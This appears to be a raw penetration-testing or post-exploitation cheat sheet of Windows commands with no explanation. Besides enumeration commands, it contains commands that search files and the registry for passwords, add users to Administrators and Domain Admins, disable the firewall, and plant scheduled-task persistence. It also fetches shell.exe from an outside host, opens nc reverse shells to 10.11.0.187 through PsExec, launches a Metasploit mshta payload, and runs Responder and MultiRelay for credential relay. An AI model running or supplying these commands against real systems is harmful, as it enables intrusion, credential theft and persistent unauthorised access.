======
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
hostname
ver
echo %username%
whoami /all
SET U All
net user <user> <password> /add
net localgroup administrators /add <user>
net group "HR Admins" myUser /add /domain
ipconfig /all
route print
arp -A
netstat -ano
netstat -ano -p TCP
netsh firewall show state firewall state
netsh firewall show config firewall config
netsh advfirewall show currentprofile
netsh advfirewall firewall show rule name=all
netsh advfirewall set allprofiles state off
net view
net users
net user user1
net config
schtasks /query /fo LIST /v
SCHTASKS /Delete /TN SERVERQR /F
SCHTASKS /create /tn SERVERQR /sc DAILY /mo 365 /tr "cmd /c echo,Y|cacls C:\Windows\Fonts*.exe /G everyone:f"
tasklist /SVC
taskkill /PID pid
taskkill /F /IM wscript.exe
net start
sc qc [service_name]
sc queryex state=
DRIVERQUERY
driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object 'Display Name', 'Start Mode', Path
Get-WmiObject Win32PnPSignedDriver | Select-Object DeviceName,DriverVersion,Manufacturer | ?{$.DeviceName -like "XBox"}
dir /a /s /b c:\'.pdf'
dir /a /b c:\windows\kb'
findstr /si password .txt .xml .xls .ini *.infrecursively from current directory
dir /s pass == cred == vnc == .config
reg query HKLM /f password /t REG_SZ /s | reg query HKCU /f password /t REG_SZ /s | reg query HKLM /v password /t REG_SZ /s
dir \IP.ADD.RE.SS\C$
mountvol
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer
dsquery
runas /u:Administrator cmd.exe
| clip
cacls <Program File>
icacls
dir /q
explorer.exe http://10.11.0.187/index.html
wmic qfe get Caption,Description,HotFixID,InstalledOn
wmic process where ExecutablePath='C:\Windows\Fonts\svhost.exe' delete
powershell -command "& {&'wget' http://10.11.0.187/shell.exe -OutFile shell.exe}"
PsExec.exe /accepteula -u <user> -p <pass> nc.exe -nv 10.11.0.187 8888 -e cmd.exe
PsExec.exe /accepteula -i -d -s nc.exe -nv 10.11.0.187 8889 -e cmd.exe
Invoke-WebRequest -uri <URL> -OutFile C:\Windows\TEMP\outfile.txt
accesschk.exe /accepteula
accesschk.exe -uws "Everyone" "C:\Program Files"
Autorunsc.exe /accepteula
C:\Users\Public\accesschk64.exe /accepteula *
accesschk.exe -vqp *
accesschk.exe -uwdqs users c:\
accesschk.exe -uwdqs "Authenticated Users" c:\
accesschk.exe -uwqs users c:*.*
accesschk.exe -uwqs "Authenticated Users" c:*.*
cacls "c:\Program Files" /T | findstr Users
echo 127.0.0.1 my.crypto-pool.info >> %WINDIR%\system32\drivers\etc\hosts
takeown /F file.txt
Start metasploit server (exploit/windows/misc/hta_server). Then, run "mshta.exe //<ip-addr>/random.hta" on the host machine.
C:\Windows\Temp
%USERPROFILE%\AppData\Local\
wmic group list brief
wmic qfe list brief
wmic desktop list brief
wmic cdrom list brief
wmic nic list brief
wmic product get name,version,vendor
wmic process get name,processid
wmic /node:localhost process call create 'C:\file.exe'
wmic process where processid="1000" call terminate
wmic /node:localhost /user:rambo /password:FirstBl00dPart3 process where name="paint.exe" call terminate
-wmic /node:"servername" /user:"user@domain" /password: "password" RDToggle where ServerName="server name" call SetAllowTSConnections 1
wmic /Node:%%A LogicalDisk Where DriveType="3" Get DeviceID,FileSystem,FreeSpace,Size /Format:csv MORE /E +2 >> SRVSPACE.CSV
wmic logicaldisk get name,providername
new view \\COMPUTERNAME
net use Z: \HOSTNAME\SHARE /PERSISTENT:YES
wmic startup get caption,command,user
wmic /node:remotehost /username:rambo /password:FirstBl00dPart3 service where name="LanManServer" get caption,name,status,started
certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
"C:\Program Files\Microsoft Office\Root\Office16\protocolhandler.exe" "ms-word:nft|u|https://url/doc.dotm"
autorunsc.exe -x > autoruns.xml
autorunsc.exe -m -v
auditpol /get /category:*
auditpol /set /subcategory:"Logon" /success:enable
net user /domain
net group /domain
net users h00p password /add /domain net group "Domain Admins" h00p /add /domain
$ldapsearch = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$searchstr); $objDomain = New-Object System.DirectoryServices.DirectoryEntry; $ldapsearch.SearchRoot = $objDomain; $ldapsearch.filter="samAccountType=805306368"; $ldapsearch.FindAll();
Get-NetLoggedon -ComputerName foobar
Get-NetSessions -ComputerName dc02
python MultiRelay.py -t 192.168.11.17 -u ALL
python RunFinger.py -i 192.168.0.0/24
python Responder.py -I eth0